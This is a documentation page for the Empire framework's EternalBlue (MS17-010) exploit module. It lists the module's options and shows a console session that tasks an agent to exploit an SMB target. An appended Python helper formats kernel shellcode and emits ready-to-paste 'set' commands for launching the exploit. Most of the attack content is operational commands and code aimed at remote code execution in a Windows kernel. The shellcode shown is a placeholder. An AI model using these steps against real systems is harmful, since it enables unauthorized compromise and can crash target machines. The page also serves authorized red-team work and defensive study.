Invoke-EternalBlue - Empire Module
This page contains detailed information about how to use the powershell/exploitation/exploit_eternalblue Empire module. For a list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-EternalBlue
Module: powershell/exploitation/exploit_eternalblue
Source code [1]: empire/server/modules/powershell/exploitation/exploit_eternalblue.yaml
Source code [2]: empire/server/modules/powershell/exploitation/exploit_eternalblue.py
MITRE ATT&CK:
T1210
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: No
Port of MS17_010 Metasploit module to powershell. Exploits targeted system and executes specified shellcode. Windows 7 and 2008 R2 supported. Potential for a BSOD.
This module runs in the foreground (the agent blocks until the task returns) and is flagged OPSEC unsafe: it throws a remote kernel exploit over SMB at the target, which produces distinctive network traffic, can crash the target (BSOD), and can be detected by AV/EDR or network monitoring.
Note that the exploit_eternalblue module does not need administrative privileges on the host running the agent, so a normal user context can launch it. The privilege gained is on the target: the supplied shellcode executes in the target's kernel, so it must be kernel-mode shellcode (for example the kernel stubs in the RiskSense MS17-010 repository referenced below), not a plain userland payload.
Required Module Options
This is a list of options that are required by the exploit_eternalblue module:
Agent
Agent to run module on.
InitialGrooms
Number of initial grooms (SMB allocations used to shape the kernel pool before the overflow).
Default value: 12
MaxAttempts
Number of times to try the exploit; grooms are incremented by 5 on each retry.
Default value: 1
Shellcode
Custom shellcode to inject, 0xaa,0xab,... format.
Target
IP or Hostname of target.
Exploit_eternalblue Example Usage
Here's an example of how to use the exploit_eternalblue module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/exploitation/exploit_eternalblue
Author Sean Dillon <sean.dillon [at] risksense.com>
       Dylan Davis <dylan.davis [at] risksense.com>
       Equation Group
       [email protected] (e0x70i)
Background False
Comments https://github.com/RiskSense-Ops/MS17-010
         https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
         http://threat.tevora.com/eternal-blues/
Description Port of MS17_010 Metasploit module to powershell. Exploits targeted
system and executes specified shellcode. Windows 7 and 2008 R2
supported. Potential for a BSOD
Language powershell
Name powershell/exploitation/exploit_eternalblue
NeedsAdmin False
OpsecSafe False
Techniques http://attack.mitre.org/techniques/T1210
,Record Options-,-------,----------,-----------------------------------,
| Name | Value | Required | Description |
|---------------|-------|----------|-----------------------------------|
| Agent | | True | Agent to run module on. |
|---------------|-------|----------|-----------------------------------|
| InitialGrooms | 12 | True | Number of Initial Grooms |
|---------------|-------|----------|-----------------------------------|
| MaxAttempts | 1 | True | Number of times to try exploit |
| | | | (increment grooms by 5 each time) |
|---------------|-------|----------|-----------------------------------|
| Shellcode | | True | Custom shellcode to inject, |
| | | | 0xaa,0xab,... format. |
|---------------|-------|----------|-----------------------------------|
| Target | | True | IP or Hostname of target |
'---------------'-------'----------'-----------------------------------'
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set InitialGrooms 12
[*] Set InitialGrooms to 12
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set MaxAttempts value
[*] Set MaxAttempts to value
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set Shellcode ..shellcode..
[*] Set Shellcode to ..shellcode..
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > set Target 192.168.100.1
[*] Set Target to 192.168.100.1
(Empire: usemodule/powershell/exploitation/exploit_eternalblue) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the task results to return from the agent.
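The two inputs most likely to go wrong in the procedure above are the Shellcode option (the page only says "0xaa,0xab,... format") and the InitialGrooms/MaxAttempts pair (the module adds 5 grooms per retry). The following helper, an added example and not part of Empire or this page, formats raw shellcode bytes (for example a file written by an external generator) into that comma-separated hex form, validates and parses such a string back, computes the groom count used on each attempt, and emits the exact `set` lines to paste into the Empire client. The sample bytes are a constructed placeholder (NOPs and an int3), not working kernel shellcode; the function names are this example's own.

```python
import re
import sys

# The option text says grooms are incremented by 5 on every retry (assumption from that text).
GROOM_STEP = 5

# Constructed placeholder bytes for the demonstration: NOP sled + int3. Not a real payload.
SAMPLE_SHELLCODE = bytes.fromhex("90909090cc")

_BYTE_TOKEN = re.compile(r"^0x[0-9a-fA-F]{1,2}$")


def format_shellcode(raw: bytes) -> str:
    """Render raw bytes in the '0xaa,0xab,...' form the Shellcode option expects."""
    if not raw:
        raise ValueError("shellcode is empty")
    return ",".join(f"0x{b:02x}" for b in raw)


def parse_shellcode(text: str) -> bytes:
    """Parse a '0xaa,0xab,...' string back to bytes, rejecting anything that is not a byte literal."""
    out = bytearray()
    for idx, tok in enumerate(text.split(",")):
        tok = tok.strip()
        if not _BYTE_TOKEN.match(tok):
            raise ValueError(f"token {idx} ({tok!r}) is not a 0x.. byte literal")
        out.append(int(tok, 16))
    return bytes(out)


def groom_schedule(initial_grooms: int = 12, max_attempts: int = 1) -> list:
    """Grooms used on each attempt: InitialGrooms, then +5 per retry, for MaxAttempts attempts."""
    if initial_grooms < 1 or max_attempts < 1:
        raise ValueError("InitialGrooms and MaxAttempts must both be >= 1")
    return [initial_grooms + GROOM_STEP * i for i in range(max_attempts)]


def build_option_commands(agent: str, target: str, raw: bytes,
                          initial_grooms: int = 12, max_attempts: int = 1) -> list:
    """Produce the 'set ...' lines for the Empire client, in the order the page shows them."""
    groom_schedule(initial_grooms, max_attempts)  # validate the pair before emitting anything
    return [
        f"set Agent {agent}",
        f"set InitialGrooms {initial_grooms}",
        f"set MaxAttempts {max_attempts}",
        f"set Shellcode {format_shellcode(raw)}",
        f"set Target {target}",
    ]


def load_raw(path: str) -> bytes:
    """Read a raw shellcode file (e.g. the output of an external generator) as bytes."""
    with open(path, "rb") as fh:
        return fh.read()


if __name__ == "__main__":
    # Usage: python this.py <agent> <target> [raw_shellcode_file] [initial_grooms] [max_attempts]
    agent, target = sys.argv[1], sys.argv[2]
    raw = load_raw(sys.argv[3]) if len(sys.argv) > 3 else SAMPLE_SHELLCODE
    grooms = int(sys.argv[4]) if len(sys.argv) > 4 else 12
    attempts = int(sys.argv[5]) if len(sys.argv) > 5 else 1
    print("# groom count per attempt:", groom_schedule(grooms, attempts))
    for line in build_option_commands(agent, target, raw, grooms, attempts):
        print(line)
```

With MaxAttempts set to 3 and the default InitialGrooms, the schedule is 12, 17 and 22 grooms; every extra attempt is another shot at the target's kernel pool, so raise MaxAttempts only if a crash of the target is acceptable.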
Authors
- Sean Dillon
- Dylan Davis
- Equation Group
- [email protected] (e0x70i)
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/exploitation/exploit_eternalblue.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/exploitation/exploit_eternalblue.py
- https://github.com/RiskSense-Ops/MS17-010
- https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
- http://threat.tevora.com/eternal-blues/
- http://attack.mitre.org/techniques/T1210
See Also
Check also the following modules related to this module:
- powershell/exploitation/exploit_jenkins
- powershell/exploitation/exploit_jboss
- powershell/exploitation/invoke_spoolsample
- python/exploit/web/jboss_jmx
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.